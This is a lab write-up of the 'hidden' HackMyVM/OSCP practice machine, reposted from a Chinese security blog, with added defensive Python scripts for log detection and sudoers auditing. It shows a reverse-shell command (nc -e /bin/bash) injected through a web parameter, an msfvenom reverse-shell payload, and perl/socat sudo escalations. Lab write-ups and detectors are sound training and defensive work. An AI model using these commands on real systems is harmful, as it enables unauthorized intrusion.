【OSCP】hidden

admin, 2024-08-12 21:05:22
Target introduction

hidden

easy

Rosicrucian cipher, domain configuration, command execution, fuzzing, perl privilege escalation, local information gathering, hydra brute force, socat privilege escalation

Information gathering

Host discovery


This looks like a hint, but it is not clear what kind of cipher symbols these are.


Port scanning

└─# nmap -sV -A -p- -T4 192.168.1.238
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 02:42 EST
Nmap scan report for 192.168.1.238
Host is up (0.00084s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
| 256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
|_ 256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Level 1
MAC Address: 08:00:27:82:C5:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.83 ms 192.168.1.238

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds

Directory scanning

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.238 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.238/.html (Status: 403) [Size: 278]
http://192.168.1.238/.php (Status: 403) [Size: 278]
http://192.168.1.238/index.html (Status: 200) [Size: 392]
http://192.168.1.238/.php (Status: 403) [Size: 278]
http://192.168.1.238/.html (Status: 403) [Size: 278]
http://192.168.1.238/server-status (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Scanning directories against the IP turned up nothing useful; on closer inspection, the image on the home page is a Rosicrucian cipher.

https://www.dcode.fr/chiffre-rose-croix


Following the hint in the format above, decoding yields a domain name: syshiddenhmv


Level 2 reached successfully.

Rescanning directories did not seem to help either.


Scanning the second-level directory again turned up the following:


Gaining access

Fuzzing the loot.php endpoint showed that it is a command execution page:

 wfuzz -c -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=id --hw 0


http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.1.158%202443%20-e%20/bin/bash
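Both the wfuzz run and the loot.php request above leave a distinctive trail in the web server's access log: one client probing a single path with dozens of different query parameter names, followed by a query value that is really a shell command. The following Python script is an added example (not part of the original write-up) that parses Apache combined-format lines and flags both patterns. The log lines, the 24-entry probe list and the detection thresholds are constructed for illustration; the `/weapon/loot.php` path and the `hack=` payload mirror what the write-up shows.

```python
"""Flag parameter-name fuzzing and shell-like query values in Apache access logs.

Added example, not from the original write-up. The log lines below are
constructed to resemble what the wfuzz run and the loot.php request would
leave in /var/log/apache2/access.log (combined format).
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache combined/common log format: client, ident, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Query values that start with or embed a shell/network tool, a shell path, or a
# command separator. Deliberately small; a production rule set would be wider.
SHELL_PATTERN = re.compile(
    r'(?:^|[\s;|&`$(])(?:nc|ncat|bash|sh|perl|python3?|socat|wget|curl)(?=\s|$)'
    r'|/bin/(?:ba)?sh'
    r'|[;|`]'
)

# Constructed sample: 24 distinct parameter names probed against loot.php (as a
# wordlist-driven fuzz would do), then the "hack" request carrying a reverse-shell
# command, then one benign request from another client.
_FUZZ_NAMES = [
    "index", "images", "download", "2006", "news", "crack", "serial", "warez",
    "full", "12", "contact", "about", "search", "spacer", "privacy", "11",
    "logo", "blog", "new", "10", "cgi-bin", "faq", "rss", "home",
]
SAMPLE_LOG = [
    f'192.168.1.158 - - [11/Jan/2024:02:50:{i:02d} -0500] '
    f'"GET /weapon/loot.php?{name}=id HTTP/1.1" 200 0'
    for i, name in enumerate(_FUZZ_NAMES)
] + [
    '192.168.1.158 - - [11/Jan/2024:02:51:12 -0500] '
    '"GET /weapon/loot.php?hack=nc%20192.168.1.158%202443%20-e%20/bin/bash HTTP/1.1" 200 0',
    '192.168.1.50 - - [11/Jan/2024:02:52:00 -0500] '
    '"GET /index.html?page=2 HTTP/1.1" 200 392',
]


def parse_line(line):
    """Parse one combined-format line into a dict with path and decoded query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["url"])
    entry["path"] = parts.path
    # parse_qsl percent-decodes values, so "nc%20..." becomes "nc ..."
    entry["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return entry


def find_param_fuzzing(entries, threshold=20):
    """(client, path) pairs that used at least `threshold` distinct query parameter names."""
    names = defaultdict(set)
    for e in entries:
        for key, _ in e["params"]:
            names[(e["ip"], e["path"])].add(key)
    return {k: len(v) for k, v in names.items() if len(v) >= threshold}


def find_shell_like_values(entries):
    """(client, path, param, value) tuples whose query value looks like a shell command."""
    return [
        (e["ip"], e["path"], key, value)
        for e in entries
        for key, value in e["params"]
        if SHELL_PATTERN.search(value)
    ]


def analyze(lines, threshold=20):
    """Run both detections over raw log lines; unparseable lines are skipped."""
    entries = [e for e in map(parse_line, lines) if e is not None]
    return find_param_fuzzing(entries, threshold), find_shell_like_values(entries)


if __name__ == "__main__":
    fuzzing, shells = analyze(SAMPLE_LOG)
    for (ip, path), n in fuzzing.items():
        print(f"parameter fuzzing: {ip} probed {n} distinct parameter names on {path}")
    for ip, path, key, value in shells:
        print(f"shell-like value: {ip} {path}?{key}={value!r}")
```

The fuzzing heuristic keys on distinct parameter names per client and path rather than on request volume, which is what separates a wordlist probe from an ordinary busy client; tune the threshold to the application, since a single legitimate page rarely accepts more than a handful of parameter names.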


Privilege escalation

https://gtfobins.github.io/gtfobins/perl/


perl is allowed via sudo, so perl is used to escalate to the toreto user.


Escalation via the sudo version vulnerability failed.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.158 LPORT=2332 -f elf -o 1.elf


A hidden directory was found under the atenea directory; it appears to contain a password wordlist.


After the brute force succeeded, log in and get the flag.


https://gtfobins.github.io/gtfobins/socat/
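Both escalations in this write-up (perl to the toreto user, then socat) work for the same reason: a sudo rule grants a binary that GTFOBins documents as able to hand back a shell. From the defender's side the fix is to audit sudoers for exactly that class of rule. The following Python script is an added example, not from the original write-up; the sudoers fragment it parses is constructed for illustration and is not the box's real configuration, and `SHELL_ESCAPE_BINARIES` is a small hand-picked subset of the GTFOBins sudo list, not the full catalogue.

```python
"""Audit sudoers rules for binaries that can escape to a shell.

Added example, not from the original write-up. The sudoers fragment below is
constructed for illustration (not the box's real configuration) and the set
of flagged binaries is a small subset of what GTFOBins documents.
"""
import os
import re

# Illustrative subset of binaries GTFOBins lists as able to run a shell (or
# arbitrary commands) when permitted through sudo.
SHELL_ESCAPE_BINARIES = {
    "perl", "python", "python3", "socat", "vim", "vi", "find",
    "awk", "less", "more", "env", "bash", "sh",
}

# user  host=(runas) [TAG:]... command[, command]...
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)'
    r'(?P<cmds>.+)$'
)
SKIP_PREFIXES = ("#", "Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")

# Constructed sudoers fragment; the perl and socat rules are in the spirit of
# the write-up's two escalations, the rest are ordinary entries.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
# the two rules below mirror the kind of grant the write-up abuses
atenea ALL=(toreto) NOPASSWD: /usr/bin/perl
toreto ALL=(ALL) NOPASSWD: /usr/bin/socat
backup ALL=(root) NOPASSWD: /bin/cat /var/log/apache2/access.log
"""


def parse_rule(line):
    """Return (user_spec, runas, [commands]) for a user rule, or None for anything else."""
    line = line.strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas = m.group("runas") or "root"  # sudo's default when no (runas) is given
    cmds = [c.strip() for c in m.group("cmds").split(",")]
    return m.group("who"), runas, cmds


def classify(command):
    """Return a reason string if the command grant is risky, else None."""
    if command == "ALL":
        return "unrestricted"
    binary = os.path.basename(command.split()[0])
    if binary in SHELL_ESCAPE_BINARIES:
        return f"shell escape: {binary}"
    return None


def audit(lines):
    """Walk sudoers lines and collect (user_spec, runas, command, reason) findings."""
    findings = []
    for line in lines:
        parsed = parse_rule(line)
        if parsed is None:
            continue
        who, runas, cmds = parsed
        for cmd in cmds:
            reason = classify(cmd)
            if reason:
                findings.append((who, runas, cmd, reason))
    return findings


if __name__ == "__main__":
    for who, runas, cmd, reason in audit(SAMPLE_SUDOERS.splitlines()):
        print(f"{who} may run {cmd!r} as {runas}: {reason}")
```

The audit treats `ALL` for root and the sudo group as informational (expected on most systems) and flags the two interpreter grants as the real findings; a rule that pins a binary to fixed arguments still deserves a manual look, since basename matching alone cannot tell a harmless invocation from one that exposes a shell.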


End


Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】hidden

Source: http://cn-sec.com/archives/3055711.html